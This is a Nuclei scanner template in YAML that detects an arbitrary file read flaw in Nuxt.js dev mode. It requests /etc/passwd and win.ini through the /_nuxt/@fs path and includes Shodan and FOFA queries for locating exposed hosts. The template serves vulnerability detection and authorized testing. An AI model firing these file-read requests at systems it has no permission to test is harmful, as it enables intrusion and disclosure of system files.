nuclei-templates/http/vulnerabilities/nuxt/nuxt-js-lfi.yaml

33 lines
862 B
YAML

id: nuxt-js-lfi
info:
name: Arbitrary File Read in Dev Mode - Nuxt.js
author: DhiyaneshDK
severity: high
description: |
Vite is misconfigured within nuxt to permit any file to be retrieved from the file system.
reference:
- https://huntr.dev/bounties/4849af83-450c-435e-bc0b-71705f5be440/
- https://bryces.io/blog/nuxt3
- https://twitter.com/fofabot/status/1669339995780558849
metadata:
fofa-query: body="buildAssetsDir" && body="__nuxt"
max-request: 2
shodan-query: html:"buildAssetsDir" "nuxt"
verified: "true"
tags: lfi,nuxtjs
http:
- method: GET
path:
- "{{BaseURL}}/_nuxt/@fs/etc/passwd"
- "{{BaseURL}}/_nuxt/@fs/windows/win.ini"
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or